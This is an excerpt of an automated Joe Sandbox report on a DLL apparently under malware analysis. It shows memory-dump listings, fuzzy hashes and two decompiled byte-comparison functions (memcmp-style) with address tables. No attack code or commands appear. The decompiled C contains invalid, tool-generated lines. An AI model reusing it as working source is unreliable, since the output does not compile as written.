Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 96d822cc69aa3fc93da2d15b1563b91117c73107614f1685f50044f1bcfdd119
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 17D1B573C0A9F3968775C16D646826EEEE2AFD258039BC3E0DCE43F289D2279D1495D0

Uniqueness

Uniqueness Score: -1.00%

Function 10021D44 Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10021D44(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x10021d44
0x10021d44
0x10021d4a
0x10021dc9
0x10021dcb
0x10021dcd
0x00000000
0x00000000
0x10021dd3
0x10021dd9
0x10021e58
0x10021e5a
0x10021e5c
0x00000000
0x00000000
0x10021e62
0x10021e68
0x10021ee7
0x10021ee9
0x10021eeb
0x00000000
0x00000000
0x10021ef1
0x10021ef7
0x10021f76
0x10021f78
0x10021f7a
0x00000000
0x00000000
0x10021f80
0x10021f86
0x10022005
0x10022007
0x10022009
0x00000000
0x00000000
0x10022015
0x10022095
0x10022097
0x10022099
0x00000000
0x00000000
0x1002209f
0x100220a5
0x10022124
0x10022126
0x10022128
0x00000000
0x00000000
0x10022136
0x10021930
0x10021932
0x1002268e
0x1002268e
0x10022144
0x10022146
0x10021d22
0x10021d2a
0x10021d2c
0x10021d3d
0x10021d3d
0x00000000
0x10021d2c
0x10022153
0x10022159
0x10022572
0x00000000
0x10022572
0x00000000
0x1002215f
0x100220ae
0x100220b0
0x100220c7
0x100220cf
0x100220d1
0x100220e8
0x100220f0
0x100220f2
0x10022109
0x10022111
0x10022113
0x10022120
0x10022120
0x00000000
0x10022113
0x100220ff
0x10022103
0x00000000
0x00000000
0x00000000
0x10022103
0x100220de
0x100220e2
0x00000000
0x00000000
0x00000000
0x100220e2
0x100220bd
0x100220c1
0x00000000
0x00000000
0x00000000
0x100220c1
0x1002201f
0x10022021
0x10022038
0x10022040
0x10022042
0x10022059
0x10022061
0x10022063
0x1002207a
0x10022082
0x10022084
0x10022091
0x10022091
0x00000000
0x10022084
0x10022070
0x10022074
0x00000000
0x00000000
0x00000000
0x10022074
0x1002204f
0x10022053
0x00000000
0x00000000
0x00000000
0x10022053
0x1002202e
0x10022032
0x00000000
0x00000000
0x00000000
0x10022032
0x10021f8f
0x10021f91
0x10021fa8
0x10021fb0
0x10021fb2
0x10021fc9
0x10021fd1
0x10021fd3
0x10021fea
0x10021ff2
0x10021ff4
0x10022001
0x10022001
0x00000000
0x10021ff4
0x10021fe0
0x10021fe4
0x00000000
0x00000000
0x00000000
0x10021fe4
0x10021fbf
0x10021fc3
0x00000000
0x00000000
0x00000000
0x10021fc3
0x10021f9e
0x10021fa2
0x00000000
0x00000000
0x00000000
0x10021fa2
0x10021f00
0x10021f02
0x10021f19
0x10021f21
0x10021f23
0x10021f3a
0x10021f42
0x10021f44
0x10021f5b
0x10021f63
0x10021f65
0x10021f72
0x10021f72
0x00000000
0x10021f65
0x10021f51
0x10021f55
0x00000000
0x00000000
0x00000000
0x10021f55
0x10021f30
0x10021f34
0x00000000
0x00000000
0x00000000
0x10021f34
0x10021f0f
0x10021f13
0x00000000
0x00000000
0x00000000
0x10021f13
0x10021e71
0x10021e73
0x10021e8a
0x10021e92
0x10021e94
0x10021eab
0x10021eb3
0x10021eb5
0x10021ecc
0x10021ed4
0x10021ed6
0x10021ee3
0x10021ee3
0x00000000
0x10021ed6
0x10021ec2
0x10021ec6
0x00000000
0x00000000
0x00000000
0x10021ec6
0x10021ea1
0x10021ea5
0x00000000
0x00000000
0x00000000
0x10021ea5
0x10021e80
0x10021e84
0x00000000
0x00000000
0x00000000
0x10021e84
0x10021de2
0x10021de4
0x10021dfb
0x10021e03
0x10021e05
0x10021e1c
0x10021e24
0x10021e26
0x10021e3d
0x10021e45
0x10021e47
0x10021e54
0x10021e54
0x00000000
0x10021e47
0x10021e33
0x10021e37
0x00000000
0x00000000
0x00000000
0x10021e37
0x10021e12
0x10021e16
0x00000000
0x00000000
0x00000000
0x10021e16
0x10021df1
0x10021df5
0x00000000
0x00000000
0x00000000
0x10021d4c
0x10021d4c
0x10021d4f
0x10021d53
0x10021d55
0x10021d6c
0x10021d6c
0x10021d70
0x10021d74
0x10021d76
0x10021d8d
0x10021d8d
0x10021d91
0x10021d95
0x10021d97
0x10021dae
0x10021dae
0x10021db2
0x10021db6
0x10021db8
0x10021dbe
0x10021dc1
0x10021dc5
0x10021dc5
0x00000000
0x10021db8
0x10021d9d
0x10021da0
0x10021da4
0x10021da8
0x00000000
0x00000000
0x00000000
0x10021da8
0x10021d7c
0x10021d7f
0x10021d83
0x10021d87
0x00000000
0x00000000
0x00000000
0x10021d87
0x10021d5b
0x10021d5e
0x10021d62
0x10021d66
0x00000000
0x00000000
0x00000000
0x10021d66
0x1002155d
0x1002155d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 276cb039fe08e2f6a1b1f29b540f17a99a8123dd2147ace181feb278aaef99e0
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: E8D19177C0A9F38A8775C12D646826EEEE2AFD159039BC3E1DCE43F289D6279D0095D0

Uniqueness

Uniqueness Score: -1.00%

Function 10021938 Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10021938(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x10021938
0x10021938
0x1002193e
0x100219bd
0x100219bf
0x100219c1
0x00000000
0x00000000
0x100219c7
0x100219cd
0x10021a4c
0x10021a4e
0x10021a50
0x00000000
0x00000000
0x10021a56
0x10021a5c
0x10021adb
0x10021add
0x10021adf
0x00000000
0x00000000
0x10021ae5
0x10021aeb
0x10021b6a
0x10021b6c
0x10021b6e
0x00000000
0x00000000
0x10021b74
0x10021b7a
0x10021bf9
0x10021bfb
0x10021bfd
0x00000000
0x00000000
0x10021c09
0x10021c89
0x10021c8b
0x10021c8d
0x00000000
0x00000000
0x10021c93
0x10021c99
0x10021d18
0x10021d1a
0x10021d1c
0x00000000
0x00000000
0x10021d2a
0x10021d2c
0x10021d3d
0x10021d3d
0x10021932
0x1002268e
0x1002268e
0x10021ca2
0x10021ca4
0x10021cbb
0x10021cc3
0x10021cc5
0x10021cdc
0x10021ce4
0x10021ce6
0x10021cfd
0x10021d05
0x10021d07
0x10021d14
0x10021d14
0x00000000
0x10021d07
0x10021cf3
0x10021cf7
0x00000000
0x00000000
0x00000000
0x10021cf7
0x10021cd2
0x10021cd6
0x00000000
0x00000000
0x00000000
0x10021cd6
0x10021cb1
0x10021cb5
0x00000000
0x00000000
0x00000000
0x10021cb5
0x10021c13
0x10021c15
0x10021c2c
0x10021c34
0x10021c36
0x10021c4d
0x10021c55
0x10021c57
0x10021c6e
0x10021c76
0x10021c78
0x10021c85
0x10021c85
0x00000000
0x10021c78
0x10021c64
